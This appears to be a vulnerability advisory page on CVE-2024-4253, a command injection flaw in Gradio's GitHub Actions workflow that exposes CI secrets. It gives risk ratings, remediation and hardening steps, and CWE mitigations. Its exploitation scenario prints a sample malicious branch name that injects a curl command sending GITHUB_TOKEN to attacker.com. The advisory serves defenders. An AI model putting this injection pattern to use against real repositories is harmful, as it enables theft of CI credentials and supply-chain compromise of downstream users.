AI Threat Alert
CVE-2024-4253: Gradio: CI/CD command injection enables secrets exfiltration
CRITICAL PoC AVAILABLEGradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.
What is the risk?
Critical risk. CVSS 9.1 with no authentication required, no user interaction, and network-accessible exploitation via any public PR submission. Gradio's dominance in ML prototyping, model demos, and Hugging Face Spaces means blast radius extends well beyond direct Gradio maintainers—a successful supply chain compromise cascades to thousands of downstream ML deployments. Attack complexity is trivial given well-documented GitHub Actions injection techniques and public PoC availability.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Gradio | pip | — | No patch |
Do you use Gradio? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.
-
AUDIT
Review all GitHub Actions workflows for unsanitized use of
github.head_ref,github.event.pull_request.head.repo.full_name, or other PR-controllable context variables passed directly intorun:steps. -
HARDEN
Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit
permissions:blocks. -
DETECT
Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.
-
DEPENDENCY HYGIENE
Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-4253?
Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.
Is CVE-2024-4253 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-4253, increasing the risk of exploitation.
How to fix CVE-2024-4253?
1. PATCH: Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version. 2. AUDIT: Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps. 3. HARDEN: Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks. 4. DETECT: Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure. 5. DEPENDENCY HYGIENE: Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.
What systems are affected by CVE-2024-4253?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, CI/CD pipelines for ML projects, agent frameworks, MLOps workflows.
What is the CVSS score for CVE-2024-4253?
CVE-2024-4253 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.69%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0025 Exfiltration via Cyber Means AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0055 Unsecured Credentials Compliance Controls Affected
What are the technical details?
Original Advisory
A command injection vulnerability exists in the gradio-app/gradio repository, specifically within the 'test-functional.yml' workflow. The vulnerability arises due to improper neutralization of special elements used in a command, allowing for unauthorized modification of the base repository or secrets exfiltration. The issue affects versions up to and including '@gradio/video@0.6.12'. The flaw is present in the workflow's handling of GitHub context information, where it echoes the full name of the head repository, the head branch, and the workflow reference without adequate sanitization. This could potentially lead to the exfiltration of sensitive secrets such as 'GITHUB_TOKEN', 'COMMENT_TOKEN', and 'CHROMATIC_PROJECT_TOKEN'.
Exploitation Scenario
An adversary targeting ML infrastructure submits a pull request to a public Gradio-based repository. The PR's branch name contains injected shell metacharacters: `feature/; curl https://attacker.com/exfil?t=$GITHUB_TOKEN #`. The test-functional.yml workflow echoes the head repository name or branch unsanitized inside a `run:` step, executing the injected command in the CI runner context. The attacker receives the GITHUB_TOKEN out-of-band and uses it to push malicious commits to the main branch or tamper with a GitHub Release artifact. Downstream ML teams installing Gradio via `pip install gradio` receive the backdoored package, compromising model serving endpoints, Gradio-based agent UIs, and any system where the framework runs with access to model weights or sensitive inference infrastructure.
Weaknesses (CWE)
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References
Timeline
Related Vulnerabilities
CVE-2024-47167 9.8 Gradio: unauthenticated SSRF in /queue/join, internal pivot
Same package: gradio CVE-2024-39236 9.8 Gradio: code injection via component metadata (CVSS 9.8)
Same package: gradio CVE-2023-25823 9.8 Gradio: hardcoded SSH key leaks via share=True demos
Same package: gradio CVE-2024-0964 9.4 Gradio: unauthenticated LFI exposes full server filesystem
Same package: gradio CVE-2023-34239 9.1 Gradio: path traversal + SSRF exposes model files & infra
Same package: gradio